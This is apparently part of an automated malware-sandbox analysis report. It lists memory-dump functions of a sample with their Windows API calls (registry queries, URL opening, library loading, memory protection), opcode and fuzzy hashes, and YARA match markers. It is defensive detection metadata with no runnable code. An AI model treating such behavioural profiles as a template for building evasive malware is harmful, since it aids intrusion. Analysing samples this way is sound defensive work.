APIs

RegQueryValueExW.KERNEL32(?,00000EA4,51D1A3FF,00000000,00000000,00000000,00000000), ref: 0097AA8C

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c6ea506ef4cdc43256937e52d54a4537a57d32740872918e212ef38590b5006d
Instruction ID: cfba9d2ede8567c8220c99bcee9f0edc263fecad56efe5052e2731ac31cc9f8f
Opcode Fuzzy Hash: c6ea506ef4cdc43256937e52d54a4537a57d32740872918e212ef38590b5006d
Instruction Fuzzy Hash: 1E219D72600700EFEB20CF15CD84F6AB7ECEF44720F08C55AE9498B251D664E948CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0097B58A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EA4,51D1A3FF,00000000,00000000,00000000,00000000), ref: 0097B5EE

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 3c1e4da4ed39795c5bf6f723e54889c2f41e5ddf0369da6a36b8cc7773760676
Instruction ID: e013fe8bcb15d8c73c18bbda5e3a316cd221a455a9d83e0d173061b3e5eb4c2a
Opcode Fuzzy Hash: 3c1e4da4ed39795c5bf6f723e54889c2f41e5ddf0369da6a36b8cc7773760676
Instruction Fuzzy Hash: 91117C72600304AFEB20CF55DC85FAABBA8EF44720F14C46AE909CB291D774E9448AB1

Uniqueness

Uniqueness Score: -1.00%

Function 00094410, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: cb1f6de0849fdaa15cdeb50ba48c9acd82ecf450f82dc5e5041ab300f47920e5
Instruction ID: 9eb22bde1a3c03be3b58c6fef25e1542af6bbd361711daf5f426e7828702b68b
Opcode Fuzzy Hash: cb1f6de0849fdaa15cdeb50ba48c9acd82ecf450f82dc5e5041ab300f47920e5
Instruction Fuzzy Hash: 6321E27018478BEBDF308E10DEA5FFE37A56F01380F148519AD4A9B582E3318946F761

Uniqueness

Uniqueness Score: -1.00%

Function 0097B4A2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EA4,51D1A3FF,00000000,00000000,00000000,00000000), ref: 0097B4FE

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 20da5c5422838357c3721d5e09825bc01df9730c1c545c090d4b5a9c5a198c40
Instruction ID: 5c8a901cc23ccb646c014d3a4208e2bbda2df43f676f1366395e20d012104f27
Opcode Fuzzy Hash: 20da5c5422838357c3721d5e09825bc01df9730c1c545c090d4b5a9c5a198c40
Instruction Fuzzy Hash: 4811BF72500300EFEB21CF55DC85BA6FBA8EF44720F14846AF9499B291D774A9448BB2

Uniqueness

Uniqueness Score: -1.00%

Function 0097A78B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0097A7F6

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fa8a8d85ad4bb60b557c232b300dbc418d993e9813edd36a7edb77fca6fdf04a
Instruction ID: 8ac1c40055db227cd23fa656a7974fba9cf82ef9755ea46d9c9482e26db07727
Opcode Fuzzy Hash: fa8a8d85ad4bb60b557c232b300dbc418d993e9813edd36a7edb77fca6fdf04a
Instruction Fuzzy Hash: 0E117572505380AFDB228F51DC44B62FFF4EF46310F08849AED858B552D275A419DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00094438, Relevance: 1.6, APIs: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 000943FA

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: fe21d3ef308e111db6e026606cb2386f2a7e618f84ef47d7d6b7ab1f03817427
Instruction ID: 2360b209a9be420e4bff661137b1c4e0dd946d88664d1dc3a2e080fb9318b5ed
Opcode Fuzzy Hash: fe21d3ef308e111db6e026606cb2386f2a7e618f84ef47d7d6b7ab1f03817427
Instruction Fuzzy Hash: 86119E7018478B9FDF358E54CD65FFE36A59F01380F104525AE4A9B252E7318906B761

Uniqueness

Uniqueness Score: -1.00%

Function 0097AD22, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0097AD6A

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5fb082dfd1f150d4cda3ae043289fef6f07aa5146bd6c531d2f6f6e507eff0bd
Instruction ID: cbb1c5b645e1f63336d12802f45b5477bcde8a83e689a350390b1622bb17a962
Opcode Fuzzy Hash: 5fb082dfd1f150d4cda3ae043289fef6f07aa5146bd6c531d2f6f6e507eff0bd
Instruction Fuzzy Hash: F311A1B2600300DFEB60CF65DC85B5AFBE8EF54321F08C46ADC49CB692D674E804CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00095709, Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00096468,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009576A

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5710333a1d6c3cc526251be722c63cd0c6080d9af3024b59fb3df7363f8465e2
Instruction ID: 1cfb2175d7cab622a2698d7a646a1f3746ccd674e8f8b5ef3ca0046c74cbbd2b
Opcode Fuzzy Hash: 5710333a1d6c3cc526251be722c63cd0c6080d9af3024b59fb3df7363f8465e2
Instruction Fuzzy Hash: BBF0285148DE15E6DE333BA77C957BCA9414720337FA00712FA92862F3D5144A84B796

Uniqueness

Uniqueness Score: -1.00%

Function 0097B6AA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EA4,?,?), ref: 0097B6FA

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 0c24cf583570ed28afc71cc07be8490c73ebdf77748f5d635ade8c02201e5edc
Instruction ID: d26bcc77a48bc5a38bf87c420390232f8ee5dc23929320a4cc993d22b219b888
Opcode Fuzzy Hash: 0c24cf583570ed28afc71cc07be8490c73ebdf77748f5d635ade8c02201e5edc
Instruction Fuzzy Hash: 6A017171900600AFE310DF26DD46B66FBA8FF88A20F14816AED089B741D275F915CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 00095743, Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00096468,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009576A

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0de03e4ab3e08598a0d0652a47924d3602bbd4ea4e5792ac7b0f9374aca514a2
Instruction ID: 1872313b88b09163e55703ee08a00b7e96029295f38a7a5cb6fb1d566f9dce43
Opcode Fuzzy Hash: 0de03e4ab3e08598a0d0652a47924d3602bbd4ea4e5792ac7b0f9374aca514a2
Instruction Fuzzy Hash: 88F0224048CE54E79E333AE37C963ACA8420730327FE00152FE929A2A3C5150B90B397

Uniqueness

Uniqueness Score: -1.00%

Function 0097A7B2, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0097A7F6

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8655b42ab2505bc6b138288aba19ce33622dcbb85c96a0cb5e552ccaca4ca27a
Instruction ID: 678997c6782241f90720e7822b4c110fdd88ef91bc80024f018660e782de624c
Opcode Fuzzy Hash: 8655b42ab2505bc6b138288aba19ce33622dcbb85c96a0cb5e552ccaca4ca27a
Instruction Fuzzy Hash: 3501AD32500700DFEB218F51D844B66FFE0EF48321F08C8AADD494A652D375A415DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0097B30E, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EA4,?,?), ref: 0097B35E

Memory Dump Source

Source File: 00000005.00000002.2351615966.000000000097A000.00000040.00000001.sdmp, Offset: 0097A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a064b2ada5e9371dc22a929bbb6e36bcc5598108fa441600fdda98b1fe70161a
Instruction ID: 7c4d71c6d14c2e447b7932a663fd8881ff045a34b8c1cac61ef58890fb1dad89
Opcode Fuzzy Hash: a064b2ada5e9371dc22a929bbb6e36bcc5598108fa441600fdda98b1fe70161a
Instruction Fuzzy Hash: B701A271900600ABD310CF16DC42B26FBA4FF88B20F14811AEC084B741D375F915CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 000956D0, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00096468,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009576A

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4b61c52fc5fe5945904ce212a472d7afd4d6cf8c94a7b1852ec379e824993877
Instruction ID: 81904e543414fa859e6864c81a1ebf4df729819d21a74c0f71ce20de02ff6fba
Opcode Fuzzy Hash: 4b61c52fc5fe5945904ce212a472d7afd4d6cf8c94a7b1852ec379e824993877
Instruction Fuzzy Hash: 1BF0275148DE15E6DF333BE33C947FCA5404B10337F900622FE62851A3D5200A807393

Uniqueness

Uniqueness Score: -1.00%

Function 000956C4, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00096468,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009576A

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 652ae05d1a0ce915156c0b26c58cd581608e4afebb486a98b97ad48905e556dd
Instruction ID: c1830e99f366787a7cc0d815b9b2206bc6f858337c79cfb9b43548fba2e60f55
Opcode Fuzzy Hash: 652ae05d1a0ce915156c0b26c58cd581608e4afebb486a98b97ad48905e556dd
Instruction Fuzzy Hash: B2F08C9044DC55EADE333BE77C44BFD91488B20337FA04226FA5285042C6248B857763

Uniqueness

Uniqueness Score: -1.00%

Function 000956F0, Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00096468,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009576A

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 402a31d81cf8b7122ba6b4e90727d13c7a7d3846e37f692f3c981eb000d172a9
Instruction ID: 35685b9118ee2393c94d01f41719fda21ae0b4ad2fc4468d63449192cd20fb30
Opcode Fuzzy Hash: 402a31d81cf8b7122ba6b4e90727d13c7a7d3846e37f692f3c981eb000d172a9
Instruction Fuzzy Hash: 8AE0ED5004DE28EADE333AE33C897FCA1014B20327F644122FE8289102C2240BC07383

Uniqueness

Uniqueness Score: -1.00%

Function 0009575D, Relevance: 1.5, APIs: 1, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00096468,00092C3B,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009576A

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a626483e267ce1c09194b8095889ceec1b194a68385e1fe848edb5bf0ab4d75f
Instruction ID: bd1aaa8abbdefddd4dbcd6bdabdfcdf6191d328cffa16d24b37e13882e132ffd
Opcode Fuzzy Hash: a626483e267ce1c09194b8095889ceec1b194a68385e1fe848edb5bf0ab4d75f
Instruction Fuzzy Hash: 24E0DF5158CD59E7AE333BF33C8A7ECA9454B20327F604062FE919B217D6284B84B782

Uniqueness

Uniqueness Score: -1.00%

Function 00093E2B, Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00093DC1,00093EB5), ref: 00093E62

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 17a084d34461648b63744d35efcf47ae3db4b0453db4f8c07389dae89a785beb
Instruction ID: 5a127b6ec4baa59a9e228c4d73022f9ce3955690dcdbd3df5c6eded970fc04b6
Opcode Fuzzy Hash: 17a084d34461648b63744d35efcf47ae3db4b0453db4f8c07389dae89a785beb
Instruction Fuzzy Hash: 6ED0A9783A0300BFFE3089618D8AFE526265BA0F00E50841DBFC5382C1C7A288A2D60A

Uniqueness

Uniqueness Score: -1.00%

Function 00093E20, Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00093DC1,00093EB5), ref: 00093E62

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9fe6f49ed42c58f4f8a303f0fb052d157f164675a6c30d96ee6e7cb8bcdcf932
Instruction ID: 93608d3ca1b581a27c84b677f75621a44703c07dea925fa8cc38da03fabc3e66
Opcode Fuzzy Hash: 9fe6f49ed42c58f4f8a303f0fb052d157f164675a6c30d96ee6e7cb8bcdcf932
Instruction Fuzzy Hash: F9D02234380340FEFE3049708D5AFFA21045F90F40F20801DBF86390C08BE09952E905

Uniqueness

Uniqueness Score: -1.00%

Function 00093E57, Relevance: 1.5, APIs: 1, Instructions: 8fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00093DC1,00093EB5), ref: 00093E62

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0371bc792c6513e969963199cbf1a42624aea35abeb84f540473a56daf7cb591
Instruction ID: a7282b1cc1286e7b1316935b9bfd4ec69515246cff735b2a1cd9bbc1487430e9
Opcode Fuzzy Hash: 0371bc792c6513e969963199cbf1a42624aea35abeb84f540473a56daf7cb591
Instruction Fuzzy Hash: B6B012A8720340AFF7310EB24C8DFC639291B30913F40842CBC0450202D339C1704724

Uniqueness

Uniqueness Score: -1.00%

Function 00B0164F, Relevance: 1.0, Instructions: 1050COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351694963.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df61a1526199c316bf891e99319060402562231cfc1ff028637d1446e1e770d4
Instruction ID: 1d12b5570b9f4800bc16248ee33f0a40e621b9c46453ff982dcd7404c4648c59
Opcode Fuzzy Hash: df61a1526199c316bf891e99319060402562231cfc1ff028637d1446e1e770d4
Instruction Fuzzy Hash: F201F433E000194AEF28459CAC902EDBBA5E7E1338F2D0EB3D529E31D1E623DD418691

Uniqueness

Uniqueness Score: -1.00%

Function 00B00AA0, Relevance: .9, Instructions: 915COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351694963.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c98fe7ef4f45ced66c86f4bc21c74365e783346e49d4d0b70aad3e500ae2f848
Instruction ID: 01eeba9915c4c3f59c7befed8f70c667b1233a1d8b9ac8ba06041ecbfb0d0730
Opcode Fuzzy Hash: c98fe7ef4f45ced66c86f4bc21c74365e783346e49d4d0b70aad3e500ae2f848
Instruction Fuzzy Hash: A762E334B193848FDB16A7B8885476E3FE29F86344F14C4AAD445CB6E2DA35CC15CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B00560, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351694963.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88de6f4ac2401df6875679e9271407b1381f09f6ffe03f582f87eabc7af59c4a
Instruction ID: d235eafae84a62c6e5d52c2006f61494cabf74bd192b0570aa5b387d7e4b6ff5
Opcode Fuzzy Hash: 88de6f4ac2401df6875679e9271407b1381f09f6ffe03f582f87eabc7af59c4a
Instruction Fuzzy Hash: 90519D2475D3C08FD302E3348865A6A3FF28F96244F1980E6D444CF6E3DA66DC1ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 1E370984, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2355119141.000000001E370000.00000040.00000040.sdmp, Offset: 1E370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020d2d4783e637b92581e9a28aecda7bf41c8aa66e66c688725b0ddca746d261
Instruction ID: 87429c557f40b97626a3aafc64d52429fd19193cf77cac77769926bd6a87b062
Opcode Fuzzy Hash: 020d2d4783e637b92581e9a28aecda7bf41c8aa66e66c688725b0ddca746d261
Instruction Fuzzy Hash: 5B11B439604284DFE301CB24D980F15FB96AB89708F24C6ADE8891B692D77FD803CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00B0152D, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351694963.0000000000B00000.00000040.00000001.sdmp, Offset: 00B00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3253c6e45abee1f2e7c4705537437cf83981766dcb901104295c4df00af546be
Instruction ID: 49cb82a819b4695867b20abeac32b1ddd203f728ec70df848270e7174daf2940
Opcode Fuzzy Hash: 3253c6e45abee1f2e7c4705537437cf83981766dcb901104295c4df00af546be
Instruction Fuzzy Hash: 5E117371E053548FDF25DFF848852AD7FF2EBD5300B1589BAC506EB281E63599028BD1

Uniqueness

Uniqueness Score: -1.00%

Function 1E370954, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2355119141.000000001E370000.00000040.00000040.sdmp, Offset: 1E370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb069cb379236053f0b01ef1820ce69354e5ad8c179f22582d51eac4d33c739a
Instruction ID: a7ae0e338bb3aeed8a1255daa94be8df299bb6e1c6c4785f6868ce2c8c6ba167
Opcode Fuzzy Hash: cb069cb379236053f0b01ef1820ce69354e5ad8c179f22582d51eac4d33c739a
Instruction Fuzzy Hash: C121A2355093C5CFC703CB20C850B45BFB2AF46308F2986EED8855B2A3C73A9816DB52

Uniqueness

Uniqueness Score: -1.00%

Function 1E3707F7, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2355119141.000000001E370000.00000040.00000040.sdmp, Offset: 1E370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab67960c722a48e88c02da8906c45196bffa3db0900a75583f1fd93fee5f6d1
Instruction ID: 87dd4bfda4b99958b8273046ea2602c0955dd3858a8bad79247287a211b9c161
Opcode Fuzzy Hash: 0ab67960c722a48e88c02da8906c45196bffa3db0900a75583f1fd93fee5f6d1
Instruction Fuzzy Hash: F701AEB65093805FD712CB159C40862FFE8EE87670749C0DFEC498B652D165B905C772

Uniqueness

Uniqueness Score: -1.00%

Function 1E370A40, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2355119141.000000001E370000.00000040.00000040.sdmp, Offset: 1E370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e97997a94c4c79ed3d81e1b5408e06104f0e3360e17351575fbe2cd674f02ae7
Instruction ID: 4f7b8e211eac3b6dfd9ffe5b1fd9d24cf8449cfafa77fb98f47f7cb48c04bd94
Opcode Fuzzy Hash: e97997a94c4c79ed3d81e1b5408e06104f0e3360e17351575fbe2cd674f02ae7
Instruction Fuzzy Hash: 61F0F6395086859FC306CB14D940B15FBA2EB89718F24C7ADE9881B662C73BA813DE81

Uniqueness

Uniqueness Score: -1.00%

Function 1E37081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2355119141.000000001E370000.00000040.00000040.sdmp, Offset: 1E370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1d6efa210d053b532cf3adff4ef14aab80113fe6656cfb04cbca26f9b2aac09
Instruction ID: 50b84cb7065374a71b751f6e4be547d3055b7fd0b8f068551de916795d5af663
Opcode Fuzzy Hash: b1d6efa210d053b532cf3adff4ef14aab80113fe6656cfb04cbca26f9b2aac09
Instruction Fuzzy Hash: C0E06DB66007008BD750CF0AEC41452F794EF84A30B08C06BDC098B711E679B5088AA2

Uniqueness

Uniqueness Score: -1.00%

Function 009723F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351612274.0000000000972000.00000040.00000001.sdmp, Offset: 00972000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89dbe25792c876bc2d811fb822b0d536c1ef67d81380545056d512bfb37c7839
Instruction ID: 0f8ff5cedc169b3a5dd7cbfed7263e8112e7ea07d6db7fc8d5aa638f73d2a32d
Opcode Fuzzy Hash: 89dbe25792c876bc2d811fb822b0d536c1ef67d81380545056d512bfb37c7839
Instruction Fuzzy Hash: FED05E7A218A818FD7168B1CC1A4B953798AF55B04F4A84F9A844CB6B3C768E981D200

Uniqueness

Uniqueness Score: -1.00%

Function 009723BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351612274.0000000000972000.00000040.00000001.sdmp, Offset: 00972000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1486211a60c72b596343147b7795ab05a66a1347e39c0d0cb01a12ec5613f04
Instruction ID: 19a8ea860d14c9f8172c4bb72c2ad7f4cfc115ee109a15005b68b7c58fa935d8
Opcode Fuzzy Hash: d1486211a60c72b596343147b7795ab05a66a1347e39c0d0cb01a12ec5613f04
Instruction Fuzzy Hash: ACD05E353106818FDB15DB1CC294F5973E8AF40B00F0684ECBC008B266C7A8E8C0C600

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000959F0, Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba84b153e535410cb63d194197e852f9fa060dcc1ed3517dd6805f2bda7fbb2
Instruction ID: 8ceec1dacf25ec65a0a73af099cad14e28c3e558adcca109c98058da4d48f9fb
Opcode Fuzzy Hash: aba84b153e535410cb63d194197e852f9fa060dcc1ed3517dd6805f2bda7fbb2
Instruction Fuzzy Hash: A8C1BD70244305FBEF355E10CDA6BEE3AA2EF55300F614129FE465B292C3BA9984BB45

Uniqueness

Uniqueness Score: -1.00%

Function 00096432, Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 76c82373656795b5b2231e651479b32e995021d7cb0391958599aba566dc6a70
Instruction ID: 8ef5ea3ae8458852592c600a9f05f8f9246b129d3a1012a4c1140932e7559032
Opcode Fuzzy Hash: 76c82373656795b5b2231e651479b32e995021d7cb0391958599aba566dc6a70
Instruction Fuzzy Hash: 4491A76050C342CEDF34CE64859476EB6E19F62364F64839AD9938B2EAD7338842F713

Uniqueness

Uniqueness Score: -1.00%

Function 0009640D, Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f25e70d7d971e1994e746307c672ddd033c9349f984e591b81da28337b6da8
Instruction ID: b5a9a2cfad99a78c7db99606b9c3da75c8c69a26f6a9ad7c28b7b6734a0d8a33
Opcode Fuzzy Hash: 31f25e70d7d971e1994e746307c672ddd033c9349f984e591b81da28337b6da8
Instruction Fuzzy Hash: CB51F86050C342CEDF35CF688590769BAE19F22364F25C29EDC968B2EAD7378442F712

Uniqueness

Uniqueness Score: -1.00%

Function 0009643D, Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 93d1723da3951b4942374c0a354a96487ad02b4a3275a6b9089b349ea35a3719
Instruction ID: a13ccb1dc4526c8b26c31556728ed88949b2f475a8c85104e7842b648b33d206
Opcode Fuzzy Hash: 93d1723da3951b4942374c0a354a96487ad02b4a3275a6b9089b349ea35a3719
Instruction Fuzzy Hash: 0051096050C342CEDF34CF648590769BAE19F62364F14C2A9DCD28B2EAD7378442F712

Uniqueness

Uniqueness Score: -1.00%

Function 00096499, Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8734a5cf8bda2dd083106a430ea8c9e07c74f20d652dd370fcda6576cf9c025e
Instruction ID: ea8bd8c350e38df0d0d89868791a07f8966ef702e3acfe402cbacd222bb41ac9
Opcode Fuzzy Hash: 8734a5cf8bda2dd083106a430ea8c9e07c74f20d652dd370fcda6576cf9c025e
Instruction Fuzzy Hash: 9451E46050C342CEDF35CF648584769BAE1AF22364F25C2A9D8968B3EAD7378442F712

Uniqueness

Uniqueness Score: -1.00%

Function 00096451, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 3d75d1456f777d9ba2d473b43b4924f46d691a5f71908d709242ae27a6800b9f
Instruction ID: a1191a7f7fcba57558407a5bbbde20a50c5e628f274b44ecfaca1272f834b8b7
Opcode Fuzzy Hash: 3d75d1456f777d9ba2d473b43b4924f46d691a5f71908d709242ae27a6800b9f
Instruction Fuzzy Hash: 3E51086050C342CEDF35CF648590729BAE19F62364F25C2A9DCD28B2EAD7378442F712

Uniqueness

Uniqueness Score: -1.00%

Function 00096477, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2351330528.0000000000092000.00000040.00000001.sdmp, Offset: 00092000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
